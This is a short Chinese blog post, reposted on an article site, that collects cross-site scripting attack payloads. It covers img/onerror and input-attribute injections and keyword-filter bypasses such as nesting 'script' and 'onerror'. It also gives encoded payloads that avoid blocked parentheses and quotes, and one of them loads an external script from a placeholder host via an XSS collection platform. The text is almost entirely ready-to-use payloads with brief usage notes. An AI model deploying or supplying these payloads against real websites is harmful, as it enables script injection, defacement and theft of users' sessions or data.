美文网首页
XSS攻击脚本

XSS攻击脚本

作者: IT胖 | 来源:发表于2019-06-10 18:12 被阅读0次

    1、常用脚本

    &lt;img src=x o<x>nerror=a<x>lert(/xss/)&gt;
"/>
<script>alert(1)</script>
"><script src=www.baidu.com>

<img src=x onerror=prompt(1);>
<img src="x" onclick="alert(1)">    (点击)
<img/**/src=1 onerror=confirm(1)>
<img src=# onerror=confirm(1)>  或/>
<img src=1 onerror=console.log(alert(1));//

在<input>标签中可尝试如下脚本
xxxxx" onmouseover="alert(123)"
xxxxx" onFocus="alert(1)"
xxxxx" onClick="alert(1)">
xxxxx");alert(1);//    (当参数在<script></script>之间时,此脚本可有效,注意闭合前面的括号等)

    2、关键字过滤<script>,onerror

    改为<scr<script>ipt>,oneonerrorrror

    3、部分反射型xss存在于title中,可闭合</title>

    如:https://www.cnblogs.com/superye/p/7343676.html?utm_source=itdadao&utm_medium=referral

    4、空格被编码或过滤时,可使用/**/或<>变相伪造成空格
    5、<input>中过滤了<>,(),''

    构造本地payload:

        xxxxxxxxxx" name=javasCript:alert%281%29 autofocus onfocus=location=this.name xx

构造payload获取:

        xxxxxxxxxx" name=javasCript:s=document.createElement%28"sCript"%29;s.src="//xxxxx.js";document.body.appendChild%28s%29 autofocus onfocus=location=this.name xx

    其中%28 %29为()的URL编码,参考:https://xsspt.com/index.php?do=binfo&id=2016-0195079

    相关文章

      网友评论

          本文标题:XSS攻击脚本

          本文链接:https://www.haomeiwen.com/subject/kqjyzqtx.html

          延伸阅读

          深度阅读

          • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

          栏目导航

          热点阅读

          关于我们|服务条款|联系我们|XSS攻击脚本|投稿指南|网站地图|RSS订阅|排版工具|手机版

          提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

          Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

          备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

          本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

          所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!